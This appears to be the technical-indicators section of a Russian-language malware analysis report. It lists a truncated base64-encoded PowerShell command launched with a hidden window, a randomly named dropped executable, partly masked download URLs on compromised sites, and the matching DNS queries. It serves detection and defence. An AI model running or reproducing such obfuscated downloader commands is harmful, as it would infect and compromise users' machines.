Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADYAaABxADkAcAA1AD0AKAAoACcAUQAnACsAJwB0AHgAJwApACsAKAAnAGQAegBzACcAKwAnAGgAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AHUAcwBlAFIAcABSAE8AZgBJAEwAZQBcAH...
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe
- http://fo#######nsathletefactory.com/wp-admin/i/
- http://ge##ing.com/forum/p/
- http://ge##ing.com/cgi-sys/suspendedpage.cgi
- http://ga###-music.com/cgi-bin/UM/
- http://fr######telfarolillo.com/laseu/c7/
- http://ev###erd.org/cgi-bin/nUi/
- http://ga##smm.org/old/M/
- http://ga##smm.org/cgi-sys/suspendedpage.cgi
- http://gr##.net/wp/C/
- DNS ASK fo#######nsathletefactory.com
- DNS ASK ge##ing.com
- DNS ASK ga###-music.com
- DNS ASK fr######telfarolillo.com
- DNS ASK ev###erd.org
- DNS ASK ga##smm.org
- DNS ASK gr##.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADYAaABxADkAcAA1AD0AKAAoACcAUQAnACsAJwB0AHgAJwApACsAKAAnAGQAegBzACcAKwAnAGgAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AHUAcwBlAFIAcABSAE8AZgBJAEwAZQBcAH...' (со скрытым окном)